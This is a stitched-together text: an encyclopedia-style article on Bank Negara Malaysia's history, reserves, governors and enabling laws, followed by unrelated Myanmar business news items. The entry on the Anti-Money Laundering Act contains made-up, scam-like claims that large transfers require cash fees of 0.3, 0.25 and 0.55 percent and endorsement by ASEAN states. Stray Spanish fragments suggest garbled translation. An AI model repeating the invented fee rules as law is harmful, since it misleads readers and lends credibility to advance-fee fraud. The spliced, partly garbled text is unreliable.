On 12 June 1967, the Malaysian dollar, issued by the new central bank, Bank Negara Malaysia, replaced the Malaya and British Borneo dollar at par. The new currency retained all denominations of its predecessor except the $10,000 denomination, and also brought over the colour schemes of the old dollar.

In 1985, following the "Plaza meeting" of G-5 finance ministers in New York City, the US dollar fell sharply causing major losses in Bank Negara's dollar reserves. The bank responded by starting a program of aggressive speculative trading to make up these losses (Millman, p. 226). Jaffar Hussein, the Bank Negara Governor at the time, referred to this strategy as "honest-to-God trading" in a December 1988 speech in New Delhi.

In the late 1980s, Bank Negara, under Governor Jaffar Hussein, was a major player in the forex market. Its activities caught the attention of many; initially, Asian markets came to realise the influence Bank Negara had on the direction of forex market. Alan Greenspan. the Federal Reserve's chairman, later realised Bank Negara's massive speculation activities and requested the Malaysian central bank to stop it.

On 21 September 1990, BNM sold between $500 million and $1 billion worth of pound sterlings in a short period, driving the pound down 4 cents on the dollar (Millman, p. 228). In response, bankers began front running Bank Negara's orders. Two years later on Black Wednesday. Bank Negara attempted to defend the value of the British pound against attempts by George Soros and others to devalue the pound sterling. George Soros won and Bank Negara reportedly suffered losses of more than US$4 billion. [ 3 ] Bank Negara lost an additional $2.2 billion in speculative trading a year later (Millman, p. 229). By 1994, the bank became technically insolvent and was bailed out by the Malaysian Finance Ministry (Millman, p. 229).

Bank Negara Malaysia's Foreign Exchange Reserves Management (1985 until 1993)

James M. Alin, School of Business and Economics, Universiti Malaysia Sabah (This study focuses on the Malaysian central bank's active FX reserves management.)

BNM started currency trading (as part the wealth diversification strategy) in 1985, did very well in the beginning but suffered huge losses in 1992 and by 1994 was technically insolvent. Against this background, the aim of this exploratory note is twofold. First, it analyses the logic behind the decision. Second, it evaluates the probable causes of the failure. Simple game theory demonstrated that decision to gamble with taxpayers' money was a dominant strategy (defection). To evaluate the probable causes of failure, we employed gamblers' ruin simulator. The findings are as follows: BNM were eventually succumbed to the curse of gambler’s ruin i. e. although it would have made enough money in the long run, it lost so much in the short-run that it could not continue to play. Two explanations why BNM fallen into the trap;

BNM officials want to bet lightly enough, relative to his capital, to fend off gambler’s ruin, but heavily enough to make the desired rate of return. Unfortunately, in real life, a gambler does not know the true odds of winning on each bet, so he/she cannot look up at the optimum betting.

BNM did not stop playing the games after winning the desired amount which is closely related to risk aversion after prior losses, gambling with house money and break even effects.

Pegging of the Ringgit and Reserves

In 1998, Bank Negara pegged 3.80 ringgit to the US dollar after the ringgit substantially depreciated during the 1997 Asian financial crisis. In July 2005, the central bank abandoned fixed exchange rate regime in favour of managed floating exchange rate system an hour after China floated its own currency. This resulted in capital flight of more than US$10 billion, thought to be due to the repatriation of speculative funds that entered the country in anticipation of the abandonment of the peg: Bank Negara's foreign exchange reserves increased by $24 billion in the one-year period between July 2004 and July 2010 (see table below). During this period there was widespread belief that the ringgit was undervalued and that if the peg was removed, the ringgit would appreciate.

Bank Negara Foreign Exchange Reserves (Source: Bank Negara, rounded to the nearest billion USD)

30 December 2008

Bank Negara continues to run a negative interest rate differential to USD. The ringgit has appreciated gradually since the peg was abandoned and as at 28 May 2007, it traded at around 3.40 to the US dollar. Malaysia's foreign exchange reserves have increased steadily since the initial capital flight, and as at 31 March 2007 the reserves stood at approximately US$88 billion, which is approximately $10 billion more than the reserves just prior to the peg being abandoned.

On 31 July 2007 the Malaysian reserves stood at approximately US$98.5 billion, which is equivalent to RM340.1 billion. The figure increased to $101.3 billion on 31 December 2007, which is equivalent to RM335.7 billion. [ 4 ] Bank Negara's international reserves increased further 15 days later to $104.3 billion or MYR 345.4 billion. [ 6 ] [ 7 ]

Governors of Bank Negara

Tan Sri William Howard Wilcock

January 1959 – July 1962

Tun Ismail bin Mohamed Ali

July 1962 – July 1980

Tan Sri Abdul Aziz bin Taha

July 1980 – June 1985

Tan Sri Dato' Jaffar bin Hussein

June 1985 – May 1994

Tan Sri Dato' Ahmad bin Mohd Don

May 1994 – August 1998

Tan Sri Dato' Seri Ali Abul Hassan bin Sulaiman

September 1998 – April 2000

May 2000 – Current

Headquarters and Branches

Bank Negara Malaysia.

The Bank Negara headquarters are located at Jalan Sultan Salahuddin; off Jalan Kuching. Bank Negara is geographically located at latitude (3.1518 degrees) 3° 9' 6" North of the Equator and longitude (101.6926 degrees) 101° 41' 33" East of the Prime Meridian on the map of Kuala Lumpur .

Bank Negara had previously maintained branches in each of the state capitals. Most of them were closed in the 1990s when retail banks began taking over most of the counter services. There are still branches maintained in Penang. Johor Bahru. Kota Kinabalu. Kuching. Kuala Terengganu and Shah Alam. Some branches were converted into currency distribution and processing centres.

Bank Negara also retains representative offices in London and New York City.

A new building for the Financial Services and Resources Center (FSRC) was constructed in 2004 to house the FSRC, SEACEN, IFSB and the FMAG (the museum arm of Bank Negara). Located along Jalan Dato Onn, in front of the Tun Hussein Onn Memorial, the building was designed by renowned Malaysian architect firm, Hijjas Kasturi Associates. Officially declared opened in August 2011, the building is now known as Sasana Kijang.

Powers of the bank

The bank is endowed with certain powers through establishment of legal Acts by the Parliament of Malaysia to help fulfill its objectives. New legislation are created and current legislation is amended to reflect the needs of the time and future.

Central Bank of Malaysia Act 2009

Provides the establishment, administration and powers of the bank. [ 8 ] This act repealed the Central Bank of Malaysia Act 1958.

Financial Services Act 2013

Consolidates the regulatory and supervisory framework for Malaysia’s banking industry, insurance industry, payment systems and foreign exchange administration matters. [ 8 ] This act repealed Banking and Financial Institutions Act 1989, Insurance Act 1996 (though sections 144, 147(4), 147(5), 150, 151 and 224 of the Insurance Act 1996 continue to remain in full force and effect by virtue of section 275 of FSA 2013), Payment Systems Act 2003 and Exchange Control Act

Islamic Financial Services Act 2013

Sets out the regulatory framework for Malaysia’s Islamic financial sector with the principal regulatory objectives of promoting financial stability and compliance with Shariah. [ 8 ] This act repealed Islamic Banking Act 1983 and Takaful Act 1984.

Money Services Business Act 2011

Gives the bank the power to license and regulate money changing business in Malaysia. [ 8 ]

Anti-Money Laundering and Anti-Terrorism Financing Act 2001

This act is actually renamed from a previous act. The act provides powers to the bank to prevent money laundering and terrorism financing. and every funds transferred from offshore banks in Malaysia to any other bank within or outside Malaysia that are above 1 million US Dollars incurs a 0.3 percent charge, and payment should be made cash to the primary bank where the funds is deposited for the period of time, 10 working days should be placed on money been transferred and such money should be investigated with care. After careful investigation, the ministry of finance Malaysia should issue and endorse a certification to show that the Central Bank has fully cleared the funds while Member states of the Association of Southeast Asian Nations (ASEAN) should also endorse their certification. This will be at a cost of 0.25 percent of the total funds to be transferred and you are advised to go through your attorney within Malaysia. A mandate of 0.55 percent of the total funds to be transferred is required to be paid in cash to the necessary authority. [ 8 ]

Development Financial Institutions Act 2002

Promotes the development of effective and efficient development financial institutions. [ 8 ]

Bank Negara Malaysia – AFI Global Policy Forum

The bank will co-host with the Alliance for Financial Inclusion (AFI) the 2013 Global Policy Forum (GPF) in Kuala Lumpur, Malaysia on 10–12 September 2013.

Establishment of the Asian Institute of Finance

Asian Institute of Finance was established in 2009 by Bank Negara Malaysia and Securities Commission Malaysia and focuses on developing human capital across the financial services industry in Malaysia.

See also


Millman, Gregory J. (1995). The Vandal's Crown: How Rebel Currency Traders Overthrew the World's Central Banks (published in UK as Around the World on a Trillion Dollars a Day . Bantam Press. ISBN  978-0593036235 .  

enlaces externos

China offers aid for Myanmar flood relief

2015-08-06 13:14 Xinhua Editor: Gu Liping

China's Ministry of Commerce said Thursday that the Chinese government will offer emergency relief aid worth 10 million yuan (1.63 million U. S. dollars) to help Myanmar's flood victims.

Floods caused by heavy seasonal rainfall since June have hit many parts of Myanmar, destroying houses, farmland, railway lines, bridges and roads.

The ministry said in a statement to work to send the aid, including 100 motorboats, to Myanmar as soon as possible.

The Chinese Embassy in Myanmar has called on Chinese enterprises in the Southeast Asian country to extend aid to flood victims, with a meeting held Wednesday to coordinate efforts in a joint rescue mission.

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US temporarily lifts Myanmar shipping restrictions

The United States has temporarily eased restrictions on trade through Myanmar's ports, a post-election move welcomed on Tuesday by business leaders in the economically booming Southeast Asian nation.

The policy shift comes after Myanmar held landmark polls last month swept by the pro-democracy opposition party of Aung San Suu Kyi and will make it easier for US companies to deal directly with the country's crucial ports and airports.

Washington lifted most trade sanctions against Myanmar after decades of brutal junta rule gave way to a quasi-civilian reformist government in 2011.

However dozens of junta-era cronies and their sprawling business interests remain on a Washington embargo.

That has made it difficult for businesses to trade with Myanmar because many key export and import points are run by still-blacklisted firms, including Yangon's busiest port terminal, which handles around half the country's freight.

But in a statement released on Monday, the United States Treasury announced a temporary six-month lifting of those restrictions.

"This is a good opportunity for the country because we lived in a closed system for 50 years, without good access to international trade," Thet Thet Khine, of the Union of Myanmar Federation of Chambers of Commerce and Industry, told AFP.

"The more open a country is to foreign trading, the more it will develop," added the businesswoman, who will also enter parliament next year as an MP for Suu Kyi's party.

The main Yangon port terminal is run by Asia World, one of the country's largest conglomerates which is owned by Steven Law.

A leaked US diplomatic cable from 2007 described him as a "top crony" to the former regime's generals and the son of a drug lord, accusations he denies. He and Asia World remain on Washington's blacklist.

In a letter to the Treasury department in July, The Clearing House Association and the Bankers Association of Finance and Trade said the ongoing sanction listings could have the unintended effect of a "de facto trade embargo" on Myanmar.

Asia World is one of the country's richest firms having benefited from years of juicy contracts under the junta and has a vast network of interests across the fast-changing nation.

The firm declined to comment on Tuesday.

A US embassy spokesman in Yangon said the temporary easing was a "technical fix" to ensure that exports to and from Myanmar continued.

"This is not a 'reward' for the recent election and does not represent a change in US-Burma sanctions policy," the spokesman said, adding that targeted bans against certain individuals and companies remained in place.

Contracted foreign investment in Myanmar amounted to 53.45 million U. S. dollars in September, bringing the total to over 44.21 billion dollars as of the end of the month since 1988, according to latest figures from the Central Statistical Organization.

Of the investment in September, which came from nine countries and regions, 37.6 million dollars were injected into the manufacturing sector, 6.61 million dollars went to the agriculture sector, 5.2 million dollars to tourism, and 4.04 million dollars to mining.

Among those countries and regions, China's Hong Kong ranked the first by pouring 12.45 million dollars into the country, followed by Britain, South Korea and France.

As of the end of August, China had invested 14.19 billion dollars in Myanmar, China's Hong Kong had channeled 6.45 billion dollars, South Korea, 3.04 billion dollars, Singapore, 2.44 billion dollars, Malaysia, 1.63 billion dollars, and Japan, 274 million dollars.

Myanmar promulgated a new foreign investment law in November 2012 to replace the over-two-decade-old similar law in a bid to attract more foreign investment to the country in line with its reform strategy.

However, rocketing prices of real estate is deterring new foreign investment from entering Myanmar.

According to Myanmar Economic Indicators released by the International Monetary Fund (IMF), Myanmar's gross domestic product (GDP) is growing by 5.5 percent in 2013, with consumer price inflation at 7.3 percent.

It is projected that the GDP will rise 6.2 percent in 2014, with consumer price inflation at 6.6 percent.

Source: Eleven Weekly Media

Best Western International (BWI), the U. S.-based global hotel chain, has opened its first hotel in Myanmar, the Best Western Green Hill Hotel in Yangon, company sources say.

BWI becomes the first U. S. hotel company to establish a presence in Myanmar, following the recent political and economic reforms enacted by the Thein Sein administration that have drawn foreign investors’ interesar.

The hotel is situated in the heart of Yangon, just 15 minutes’ drive from the Shwedagon Pagoda. It has 189 air-conditioned rooms featuring 32-inch flat-screen televisions with international satellite channels, bathrooms with bathtubs and showers, and complimentary Wi-Fi.

It also offers three meeting rooms offering more than 200 square metres of functioning space for business people. There is also a restaurant that serves a selection of Chinese, Asian and international cuisine.

“The launch of Best Western International’s first hotel in Myanmar means the company now has a presence in nine ASEAN countries. Best Western International is planning to announce further developments in Myanmar in the near future,” BWI said in a statement.

Next year the company will launch its first hotel in the country’s capital, Nay Pyi Taw, the statement said.

“There is no doubt that Myanmar is one of the world’s hottest hotel markets at present, with a major increase in new hotel supply needed to cater for a huge influx of guests. So it is vital that hotel owners in the country choose the right partners to ensure optimum performance at their properties,” said Glenn de Souza, the firm’s vice president of international operations for Asia and the Middle East.

“Best Western International wants to form long and lasting partnerships in Myanmar; we want to be here for the long-term, to help grow the country’s tourism industry. Our partnership with the Green Hill Hotel is just the start of our plans for Myanmar.”

De Souza also expressed confidence in the Myanmar project, adding that BWI’s proven track record in the Asian hotel market will enable the Green Hill Hotel to not only increase occupancy and average rates, but also broaden its geographical guest mix.

Best Western International is the world’s largest hotel chain with more than 4,000 independently owned and operated member hotels in more than 100 countries worldwide. Since 1946, Best Western has grown into an iconic brand that hosts 400,000 guests worldwide each night.

Source: Eleven Weekly Media

The Myanmar government is planning to provide electricity next year for 10,000 villages that have yet to access electricity, said Myint Oo, deputy director-general at the Ministry of Livestock, Fisheries and Rural Development.

Currently, only 20,000 of the 64,000 villages in Myanmar have access to electricity. “We didn’t set a deadline to give electricity to all the villages. Next year, we will work to provide electricity for 10,000 villages. In 2015, we will provide electricity to another 10,000 villages. More than 40,000 villages still do not have electricity access,” said Myint Oo.

The World Bank, Asia Development Bank, and Japan International Cooperation Agency have pledged to help with the electricity supply for Myanmar villages, he added.

“As of today, we’ve given light to more than 20,000 villages. This is what we have done in less than one year. Some villages also did it on their own. Next year, we plan to give electricity to 10,000 villages, but budget is important,” said Myint Oo, adding that the government will need to work together with local and foreign aid groups to reach its ultimate target of universal access. This is welcome news for village residents.

“Although ours is a country rich in natural resources, we can’t even access electricity yet. If the government really wants to develop rural areas, electricity plays a crucial role in improving our living standard,” said Than Myint from Shwe Pan Taw Village, Thegon Township, Bago Region.

Source: Eleven Weekly Media

In Hanoi: Chu Van Anh Phone: +844 3943 8745 E-mail: canh1@ifc. org

IFC Works with Myanmar Government to Generate Investment and Improve Business Environment

Naypyidaw, Myanmar, December 20, 2013—IFC, a member of the World Bank Group, today signed a memorandum of understanding with Myanmar’s Ministry of National Planning and Economic Development to support its efforts to improve the country’s investment policy and regulation framework. This will make it easier to do business in Myanmar and help stimulate domestic private sector growth and attract sustainable foreign investment.

IFC will work with the ministry on a new investment law and regulations to improve protection for both foreign and domestic investors and streamline investment approval procedures to promote a business enabling environment. By combining the two existing separate laws for local and foreign investors, the new law aims to create a level playing field for all businesses.

“The cooperation with IFC will help accelerate our continued efforts to create a more business-friendly environment for both domestic and foreign investors,” said U Aung Naing Oo, Director General of the Directorate of Investment and Company Administration, Ministry of National Planning and Economic Development. “We will be able to enhance our own investment policy and business regulations through this cooperation and hope to learn from international best practices.”

IFC will also help Myanmar implement investment climate reforms in top priority areas, including promoting a public-private dialogue platform to facilitate the reform process.

“Together with the World Bank, IFC is supporting the government’s economic reforms aimed at strengthening the private sector as a key driver for economic growth and employment in Myanmar,” said Vikram Kumar, IFC Resident Representative for Myanmar. “Improving Myanmar’s investment policy and strengthening the regulatory framework will encourage private sector investment and increased competition within Myanmar as the country becomes more integrated with ASEAN and the rest of the world.”

IFC is supporting the government’s market-oriented reforms by providing advisory services and investment to strengthen the private sector. This will create investment opportunities and jobs that will benefit the population and lead to greater shared prosperity. IFC is also working with the government and financial sector to improve access to finance for small and medium enterprises and to increase financial inclusion through microfinance. Efforts are also underway to assist with private sector involvement in infrastructure, with an initial focus on the power and telecommunications sectors.

About IFC IFC, a member of the World Bank Group, is the largest global development institution focused exclusively on the private sector. Working with private enterprises in more than 100 countries, we use our capital, expertise, and influence to help eliminate extreme poverty and promote shared prosperity. In FY13, our investments climbed to an all-time high of nearly $25 billion, leveraging the power of the private sector to create jobs and tackle the world’s most pressing development challenges. For more information, visit www. ifc. org

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The Ministry of Electric Power has invited private firms to produce electricity in any part of the country, according to an official release on December 17.

Currently, 23 companies have been granted permission to generate electricity in 84 townships. Any private firms which want to build gas-fired power plants, hydropower plants and coal-fired power plants are invited to submit applications to the Ministry of Electric Power, said the release.

Interested investors have to mention the details of the proposed project including the type of the power plant and the exact location where it will be set up. Projects that meet the required standards of environmental and social assessments will be allowed, according to the ministry.

This is the third time the Ministry of Electric Power has invited private sector for electricity generation. The first and second times took place on June 1, 2012 and September 21, 2012 respectively.

Myanmar currently produces 3,300 mega watts in total. The production capacity falls nearly half in summer, so the country is always in deficit of over 300 MW every year, according to Yangon City Electricity Supply Board.

One of the reasons for electricity shortage in summer is that most of electricity production facilities in Myanmar are hydropower plants. They operate fine in the rainy seasons between June and October but their production falls in summer between February and May, according to Aung Khine, chairperson of Yangon City Electricity Supply Board.

South Korea-based Korea Western Power Company is planning to invest between US$ 500 million and US$ 700 million to set up a 500 MW gas-fired power plant and a trash-fired power plant in Myanmar.

Source: Eleven Weekly Media

The joint secretary of the Union of Myanmar Federation of Chambers of Commerce and Industries (UMFCCI), has urged Chinese investors not only to buy raw materials from Myanmar but also to set up factories.

Aye Lwin was speaking at a business meeting between Myanmar and Chinese entrepreneurs on December 16, co-organised by the UMFCCI and the China Council for the Promotion of International Trade (CCPIT) of Guangdong Province.

"I would like to request the business people not just to purchase raw materials from the country but also to establish factories with us and export manufactured products to various destinations around the world," Aye Lwin said.

The 22-member delegation of the CCPIT (Guangdong) arrived in Myanmar on December 11 to explore business opportunities. They said they aim to make joint ventures in wood manufacturing, shoe making, advertising and media as well as other businesses in Myanmar.

They planned to invest a total of US$ 75 million.

During the meeting, Myanmar business people suggested that China should readjust its high taxes on the import of finished-goods from Myanmar. They said China imposes low taxes on raw materials but high taxes on finished goods from Myanmar.

Ren Shao, assistant director of the Department of Foreign Trade and Economic Cooperation of Guangdong Province, said she would report this to the Chinese government.

China is still the largest foreign investor in Myanmar with 51 businesses amounting to US$ 14 billion.

Source: Eleven Weekly Media

Myanmar Shwe Development Public Company has said it will begin selling gold bars at a price of Ks 250,000 to Ks 4 million from February 12 next year.

The gold bars weighing 2.5 grams will cost Ks 250,000 and the biggest available gold bar, weighing 100 grams, will sell for Ks 4 million.

"It would be the first step of our company in the market. It’s chiefly aimed for local gold collectors. The quality of gold bars is 99.99 percent pure. We will also make our brand not to be imitated. We learned the know-how in India and European countries. We will also buy back the gold bars if our customers want to resell them," said Ye Thu Aung, a director for the company.

The company said it will sell its gold bars locally at first, and later will export internationally them according to the market demand. Win Myint, the minister for commerce said at a recent meeting that Myanmar companies should learn techniques from abroad to make value-added gold products which can be exportable to foreign markets. He added that strict action will be taken against illegal gold trade in the country.

Myanmar Gold Entrepreneurs Association held its 11th formal meeting on December 15 in Yangon. Yangon chief minister, the minister for commerce, the deputy minister for mining and officials joined in the meeting.

Than Tun Aung, the deputy minister for mining said the amended mining law has been submitted to parliament for approval. Myanmar Gold Entrepreneurs Association was established on November 27, 2002.

Source: Eleven Weekly Media

EU seeks to invest in Myanmar's mining industry

EU countries are planning to sign an agreement with the Ministry of Mines to begging investing in Myanmar's mining industry.

"If EU countries are working in Myanmar’s mining industry, it will be beneficial for Myanmar because they [EU countries] have higher technology than the Chinese who are exploring in Myanmar now," said Mining Department Director Win Htein.

Myanmar has found minerals in more than 200 townships, according to the vice president of the Myanmar Federation of Mining Association. Among them, only seven kinds of minerals are profitable. Other 18 kinds of rare minerals such as gold, uranium and platinum are limited to explore.

At present, Myanmar is amending laws to improve the mining sector and the Mining Bill has been currently been submitted to parliament. If the parliament enacts the bill, it can create better prospects for the foreign investment, Deputy Minister for Mining Than Tun Aung said.

Australian analysts William Sullivan and Peter Church Oam said that there are people who need to depend on permits, recommendation letters, and licenses to explore for potential mining opportunities.

There is no guarantee as of yet to exploration and some legislators do not point out the laws for mega mining projects with a long time plan.

Mining sector is the fourth largest foreign investment with value of more than US$ 2.8 billion. Investment to Myanmar is mostly in energy, oil, and natural gas and production.

Source: Eleven Weekly Media

Products from the German pharmaceutical producer STADA are now also available in Myanmar (Burma). Local partners offer the relevant STADA products, including both generics and branded products, on the market via in-licensing. The product range on offer is to be expanded gradually. This makes STADA one of the first western pharmaceutical companies to take up activities in this Southeast Asian country.

"Myanmar fits perfectly into our strategy of continuous internationalization while focusing on high-growth emerging markets in the process", says Hartmut Retzlaff, Chairman of the Executive Board of STADA Arzneimittel AG. "Now that the country has opened up, the supply of medicines in the market with a population of 60 million shows substantial pent-up demand, particularly for high-quality, low-cost medicines. We intend to be present from the beginning. The licensing model and our experience in Asia have provided us good opportunities in the future market of Myanmar."

"STADA's commitment is very forward-looking", explains Christian-Ludwig Weber-Lortsch, Ambassador of the Federal Republic of Germany to Myanmar. "Everyone involved benefits from the Burmese market opening up. German companies like STADA can penetrate a growing market with future prospects. The population, on the other hand, gains access to a high-quality yet low-cost supply of medicines.

The production of medicines for Myanmar is to commence from the end of 2015 in a newly built production facility in Yangon financed by local partners. To that end, "Stada Myanmar Joint Venture Co. Ltd." was founded; the STADA Group has no shareholding in this company. The license agreement, however, gives STADA the option of taking over the company at a later date. Until then, the Burmese market will be supplied with products from the Vietnamese production facilities of the STADA Group.

About STADA Arzneimittel AG: STADA Arzneimittel AG is a publicly-listed company with headquarters in Bad Vilbel, Germany. STADA consistently focuses on a multi-pillar strategy of generics and branded products (OTC) with an increasingly international market orientation. The Group is the only independent generics producer in Germany. Worldwide, STADA is one of the five leading companies in the generics industry and is represented in more than 30 countries with approximately 50 subsidiaries. Branded products such as Mobilat, Grippostad and Ladival are among the highest selling in their product category in Germany. In financial year 2012, STADA achieved Group sales of Euro 1,837.5 million, adjusted earnings before interest, taxes, depreciation and amortization (EBITDA) of Euro 367.5 million and adjusted net income of Euro 147.9 million. As of December 31, 2012, STADA employed 7,761 people worldwide.

For more information, please contact: STADA Arzneimittel AG Media Relations D-61118 Bad Vilbel Germany Phone: +49(0) 6101 603-165 Fax: +49(0) 6101 603-506 e-mail: press@stada. de

Government is planning to buy trash-fired power plants to produce electricity with a loan from Japan, Yangon Mayor Hla Myint said in Yangon region parliament session on Thursday.

The plants will cost US$16 million and government will get an US$8 million loan from Japan. Yangon City Development Council (YCDC) will provide the rest. The incineration plant located near Taw Kyaung Lay cemetery beside Hlawgar Road can only generate enough energy to run itself.

YCDC has chosen Chasson International Korea Co. Ltd. to generate electricity from Htein Pin garbage pit and the joint-ventured company of a local company Zeya & Association and Hondi (Korea) to generate electricity from Dawei Chaung garbage pit among 43 companies who submitted the proposal for the tender offered by YCDC.

The electricity generated from trash-fired power plants is intended to sell to industrial zones. The company [Chasson International Korea Co. Ltd.] has planned to generate electricity at Htein Pin garbage pit with three-year plan. In first-year, the power plant can generate 12 megawatt per hour and in second year, if can produce 10 megawatt per hour. In final phase, it can generate 8 megawatt per hour. Another joint-venture company has planned to generate electricity at Dawei Chaung garbage pit with two-year plan. It is expected to generate 15.4 megawatt per hour. Both projects can be started in early next year.

Source: Eleven Weekly Media

Myanmar’s total trade volume has nearly hit US$16 billion in the first nine months of fiscal year 2013-14, according to the Ministry of Commerce.

The trade volume reached US$15.92 billion between April 1 and December 6, which is US$3.65 billion up from the same period last year.

The government has targeted US$25 billion for the whole total trade in 2013-14, of which 20 percent is budgeted from border trade and 80 percent from overseas trade.

Myanmar exported mainly rice, maize, beans, peas, sesame seeds, rubber, marine products, teak, hard wood, metals, natural gas, gems and garment to China, India, Bangladesh, Australia, the United Arab Emirates, Belgium, Indonesia, Italy, Japan, Korea, Malaysia, Pakistan, Philippines, Russia, Saudi Arabia, Singapore, Spain, Thailand, the United Kingdom, the United States and Vietnam, said the report from the Central Statistical Organization Office.

Different consumer goods, industrial products, electronic goods, automobiles and other materials were imported during the period. To boost trade, Myanmar signed border trade agreements with India, Thailand, China and Bangladesh, the report said. One of the reasons behind the increase of trade figures is the result of the government’s measures against illegal trade along the borders, critics remarked.

Source: Eleven Weekly Media

Japan, Myanmar sign investment pact to nurture business ties, improve protections

Japan and Myanmar have signed an investment treaty to nurture closer business ties as the once secluded Southeast Asian country opens its fast-growing economy to more foreign commerce.

Prime Minister Shinzo Abe and Myanmar President Thein Sein concluded the agreement Sunday in summit talks following a gathering of leaders from the Association of Southeast Asian Nations in Tokyo.

Japanese businesses have been eager to invest in Myanmar and have stepped up their activities there after Thein Sein's reformist government came to power in 2011 after nearly 50 years of military rule. Japan's trade ministry said the agreement is intended to provide greater protections and a stable legal environment for investors.

Attracting foreign investment and lending is crucial for aiding the expansion of Myanmar's resource-rich economy.

Source: Fox News

5th Annual Mobile Payments & E-Commerce Emerging Markets/Asia Pacific 2014 Summit to be held in Yangon

Event Date 13-14 February 2014 Event Venue Inya Lake Hotel, Yangon, Myanmar Event Website www. magenta-global. com. sg/MobilePaymentsECommerceEmergingMarketsAsiaPacificMyanmar2014/

Contact Name Merilynn Contact Tel +65 6391 2549 Contact Fax +65 6299 4373 Contact E-mail merilynn@magenta-global. com. sg

Event Description The 5th Annual Mobile Payments & E-Commerce Emerging Markets/Asia Pacific 2014 Summit is set to take place on 13-14 February 2014 at Inya Lake Hotel, Yangon, Myanmar after its successful runs in Singapore, Vietnam, Ghana, Sri Lanka, Bangladesh & Cambodia.

Why Myanmar? The Central Bank of Myanmar is now promoting mobile banking and payments in Myanmar. E-Commerce and Mobile Commerce is about to boom in this new emerging economy. Indeed, Myanmar's business landscape could be drastically reshaped through the fast adoption of Mobile Commerce and E-Commerce, especially with the two foreign telcos rolling out their new services in 2014. Businesses in Myanmar can establish partnership, collaboration or joint ventures with telcos, e-Commerce companies & banks, capitalizing on current mobile trends and technologies, to rollout new business or product offerings and earn new and ancillary revenue. Join this Summit to learn and network with experts to prepare for the approaching waves of mobile revolution.

Emerging Market Opportunities In other emerging markets in Asia Pacific & the Middle East, there are also arising new opportunities in Mobile Payments and E-Commerce. In addition to Myanmar, the Summit will also focus on Tapping New Opportunities in Mobile Payments and e-Commerce in regions including Asia, the Middle East and Central Asia. Expect to meet the mobile payments and e-commerce industry experts who will share their case studies on the successful deployment of mobile payments, mobile banking and e-commerce in emerging markets.

This timely Summit aims to be a learning and networking platform bringing together decision makers and corporate leaders from banks, telcos, ICT, internet sectors and enterprise end-users. Prepare now for the upcoming mobile revolution.

To register, e-mail merilynn@magenta-global. com. sg or call +65 6391 2549.

Japan has launched an initiative to modernise Myanmar’s postal system by introducing its fast, efficient and precise services in the Southeast Asian country.

The initiative is part of Prime Minister Shinzo Abe’s economic revitalisation plans featuring exports of its advanced technologies and services to other countries, especially developing countries in Asia.

Japan and Myanmar have held three rounds of working-level talks so far, but Japanese officials believe it would take a lot of time to introduce the Japanese-style postal services in Myanmar where people are not even used to writing postal codes.

“It takes a week or so in Myanmar to get mail and parcels delivered from the northernmost to the southernmost part of the country,” said Masatoshi Kawano, a Ministry of Internal Affairs and Communications official involved in the initiative.

“But media reports that postal items frequently get lost in Myanmar may be exaggerated,” Kawano said.

“We all know Myanmar’s economy will grow more, so better postal services will definitely be necessary to support growth.

“The Japanese postal system delivers 98 percent of all postal items within two days, no matter where in the country the sender and receiver are.

During an inspection of Tokyo post offices on the sidelines of bilateral postal talks in May, Myanmar Communications and Information Minister Myat Hein appeared to have been impressed with Japanese workers sorting items efficiently and serving customers well.

In September, Myat Hein met again with his Japanese counterpart Yoshitaka Shindo to confirm their commitment to start actual work in 2014, while Vietnam became the second country to reach a similar postal support agreement with Japan.

Kawano, director of the International Affairs Office at the ministry’s Postal Services Policy Department, cited the difficulty of teaching local workers the Japanese way of providing postal services as his major concern.

Source: The Hindu Business Line

Chief of the International Monetary Fund (IMF) Christine Lagarde has reiterated the international institution's continued support to Myanmar in terms of policy advice, technical assistance and training, state media reported Sunday.

"In addition to our many teams working to support Myanmar based in IMF Headquarters and periodically visiting the country, we have a resident representative in Myanmar and are building a team of resident technical experts to be on call to help the authorities as they develop their institutions," IMF Managing Director Lagarde was quoted as saying.

"We also have an office in Bangkok with a number of experts largely dedicated in supporting Myanmar," she said, assuring that the fund will never stop working with Myanmar and adding that the IMF is a long-term partner looking forward to supporting the country's bold and exciting economic and political transition."

Lagarde arrived in Nay Pyi Taw Friday on her first visit to Myanmar.

During the two-day visit, Myanmar Vice President U Nyan Tun met with Lagarde and the pair discussed IMF assistance in reform process of banking system, financial sector and monetary policy in Myanmar as well as further cooperation in developing financial reform process of Myanmar in a short time.

During her visit, Lagarde also met with opposition leader Aung San Suu Kyi and delivered a speech at the Yangon University of Economics.

Moreover, she attended the World Women Forum in Yangon, organized by the Embassy of France.

IMF predicted Myanmar's economy to grow 6.75 percent in the 2013-14 fiscal year, driven by natural gas, sale and investment as Myanmar takes step to reform its financial system.

In January this year, the IMF agreed to cancel nearly 6 billion US dollars' debt owed by Myanmar.

Lagarde's visit represents the final leg of her Asian tour, which has taken her to Cambodia and South Korea.

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Myanmar will increase the number of mobile phone users to 50 percent of the population in the 2013-14 fiscal year from the current rate of 10 percent this year, according to Myanmar Post and Telecommunications (MPT).

Although the number of mobile phone users in Myanmar has increased rapidly in recent years, the mobile phone penetration rate remains very low, in proportion to the population.

MPT announced earlier that it would add 14 million mobile phones to the market by the 2015-16 fiscal year.

“Nowadays, things have happened a lot in the telecoms sector. And many changes will soon follow. Foreign telecoms companies will soon sell their services here. Local costumers will have options to choose from. MPT will work to increase the mobile phone penetration rate in the country,” said an MPT official.

Myanmar’s mobile penetration rate reached 10 percent of the population in the 2012-13 fiscal year. MPT expects it to reach as high as 85 percent during the 2015-16 fiscal year.

In recent years, MPT has gradually reduced the market price for mobile SIM cards, but the country is still a long way off from having everyone possess a mobile.

Source: Eleven Weekly Media

Daiwa to help AGD bank’s transformation as public company

Japan’s Daiwa Securities Group will assist locally-owned Asia Green Development (AGD) Bank to transform as a public company, sources say.

The Memorandum of Understanding (MoU) to proceed with initial public offerings between the two organizations was signed on Monday at Kandawgyi Palace Hotel in Yangon.

Daiwa is helping the government to establish a stock market in Myanmar by October 2015.

“We will assist the AGD bank to be in line with stock exchange laws within two years before the launch of the Myanmar stock market,” said an official from Daiwa.

Daiwa will provide the necessary information to ensure the bank is listed in the stock exchange.

“We will help to prepare legal documents to list the bank in the Myanmar stock exchange,” él dijo.

Firms that want to be listed in the stock exchange as public companies need to prepare legal documents and seek permission from the Securities Exchange Commission (SEC) to sell company shares. After receiving approval, the firms can sell the shares to the public.

Source: Eleven Weekly Media

The Philippines and Myanmar will forge agreements on trade and investments and agriculture on Thursday, a senior government official said Wednesday.

